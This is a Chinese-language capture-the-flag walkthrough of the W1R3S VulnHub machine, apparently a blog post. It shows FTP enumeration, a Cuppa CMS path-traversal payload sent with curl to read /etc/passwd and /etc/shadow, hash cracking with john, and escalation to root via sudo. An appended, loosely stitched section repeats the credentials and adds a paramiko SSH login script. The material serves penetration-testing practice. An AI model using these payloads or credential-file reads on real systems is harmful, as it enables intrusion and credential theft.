W1R3S.inc靶机

扫描IP

端口扫描

开放端口 21、22 和 80

目录扫描

收集到信息来看,ftp端口开放并且允许匿名登陆,登录名和密码都写:Anonymous

将ftp上的所有文件都使用get命令下载到kali上

从Ftp服务器下载的文件有: 01.txt02.txt03.txtemployee-names.txtworktodo.txt

可以看到02.txt文件有两段信息,凭经验可以推断出上面一个是md5加密后的字符串,下面一个是base64加密后的字符串

尝试md5解密

MD5解密后的结果为: This is not a password, 意思是"这不是一个密码", 属于无效信息

对base64字符串进行解密

echo "SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==" | base64 -d

解密后的内容为"lt is easy, but not that easy", 意思是"这是简单的, 但不是那个简单", 字面意思有点模拟两可, 属于无效信息

查看03.txt文件, 输出一段艺术字体, 信息量很小

查看employee-names.txt文件, 从内容上看是应该是员工信息, 排版位员工名字对应所在部门

查看worktodo.txt, 文件内容是一段倒置过来的字符串

经过处理后得到的文本信息分别是"I don't thınk this is the way to root!"和"we have a lot of work to do, stop playing around", 整段意思是"我不认为这是得到root权限的一种方式, 我们有很多工作要去做, 停止在这里乱搞", 简单来说此处啥都搞不了, 要从其他地方入手

刚刚目录扫描,爆出两个可疑目录/administrator/wordpress

提示没有Administrator权限, 那么此处先放弃

从网站的标题可以看出是该网站的cms为Cuppa, 也可以使用whatweb命令查询

使用searchsploit命令查询Cuppa cms是否存在漏洞:

searchsploit cuppa cms

发现存在一处漏洞, 漏洞详情保存在25971.txt中, 将其导出来:

searchsploit cuppa cms -m 25971.txt

查看漏洞详情得知, 该cms可通过文件包含漏洞读取任意文件, 我们选取其中一个payload: http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd来试试

浏览器访问:, 没有回显, 此处用的是Get请求, 后面尝试下POST请求

http://192.168.111.141/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

使用curl命令提交Post请求: , 成功得到目标主机的passwd文件内容

curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.111.141/administrator/alerts/alertConfigField.php

获取目标主机的shadow文件: 这里可以看到两处很明显的用户信息

curl -X POST -d urlConfig=../../../../../../../../../etc/shadow http://192.168.111.141/administrator/alerts/alertConfigField.php

将shadow文件内容复制到hash.txt中, 然后使用john命令进行破解: john hash.txt

破解后可知两个用户登录口令, 分别是www-data/www-dataw1r32/computer

使用ssh命令登录w1r3s用户:

ssh w1r3s@192.168.111.141

查看当前用户的权限:sudo -l, 可以发现是全权限

直接执行sudo su获取root用户权限

### 关于 W1R3S.v1.0 的 IT 内容及相关下载 W1R3S 是一款由 VulnHub 提供的虚拟机靶场环境,主要用于渗透测试学习和实践。以下是关于 W1R3S.v1.0 版本的相关信息: #### 靶机基本信息 W1R3S.v1.0 是一个初级难度的 CTF 类型靶机,发布于 2018 年 2 月 5 日[^5]。该靶机的目标是通过渗透测试获取系统的 `root` 权限,并找到位于 `/root` 目录下的标志文件 `flag.txt`。 #### 下载链接 W1R3S.v1.0 的官方下载地址如下: - 官方页面:[VulnHub - W1R3S](https://www.vulnhub.com/entry/w1r3s-101,220/) - ZIP 文件下载地址:[https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip](https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip) #### 初始访问凭证 为了进入靶机系统,可以使用默认的 SSH 凭证进行登录: - 用户名:`w1r3s` - 密码:`computer`[^4] #### 渗透测试目标 根据靶机描述,您的主要任务包括: 1. 获得系统的 `root` 权限。 2. 找到并读取 `/root/flag.txt` 中的内容作为最终标志。 #### 可能存在的漏洞 在 W1R3S.v1.0 中提到的新 FTP 服务器可能是一个潜在的安全弱点。这表明可以通过分析 FTP 服务来寻找未授权访问或其他安全配置错误的机会[^2]。 #### 示例代码:SSH 连接脚本 以下是一个简单的 Python 脚本,用于通过 Paramiko 库实现自动化 SSH 登录: ```python import paramiko def ssh_connect(host, username, password): client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: client.connect(host, port=22, username=username, password=password) stdin, stdout, stderr = client.exec_command('whoami') output = stdout.read().decode('utf-8').strip() print(f"Connected as user: {output}") except Exception as e: print(f"Error connecting to host: {e}") if __name__ == "__main__": ssh_connect('192.168.11.134', 'w1r3s', 'computer') # 替换为目标主机 IP 地址 ``` 此脚本可用于验证初始凭据的有效性以及进一步探索系统功能。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值